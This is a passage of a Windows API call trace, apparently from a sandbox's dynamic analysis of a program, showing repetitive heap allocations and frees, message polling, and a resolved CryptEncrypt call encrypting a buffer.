lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0196.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0196.789] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0196.789] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0196.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0196.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0196.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0196.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0196.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0196.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0196.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0196.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0196.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0196.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0196.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0196.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0196.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0196.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0196.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24e6098 | out: hHeap=0x25c0000) returned 1 [0196.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0196.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.792] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0196.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0196.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0190 | out: hHeap=0x25c0000) returned 1 [0196.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0196.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0196.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0196.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a9eb8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0196.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.794] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0196.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0196.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6508 [0196.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0196.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0196.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0196.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0196.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0196.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0196.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0196.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0196.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0196.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0196.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0196.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0196.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0196.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0196.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0196.844] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x7315, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x7318) returned 1 [0196.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0196.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0196.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0196.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0196.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0196.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0196.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0196.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0196.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0196.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0196.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0196.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0196.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0196.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0196.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0196.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0196.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0196.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0196.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0196.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0196.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0196.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0196.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0196.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0196.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0196.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0196.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0196.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0196.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0196.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0196.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0196.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0196.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0196.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0196.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0196.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0196.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0196.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0196.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0196.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0196.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0196.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0196.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0196.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0196.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0196.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0196.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0196.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0196.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0196.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0196.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0196.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0196.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0190 | out: hHeap=0x25c0000) returned 1 [0196.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0196.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.848] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0196.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0196.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0196.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0196.848] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.848] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0196.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0196.848] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0196.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0196.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0196.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0196.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0196.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0196.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0196.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0196.849] CharLowerBuffW (in: lpsz="byte[29464]", cchLength=0xb | out: lpsz="byte[29464]") returned 0xb [0196.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0196.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0196.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0196.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0196.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0196.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0196.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0196.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0196.849] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.849] RtlAllocateHeap (HeapHandle=0x25c0000, 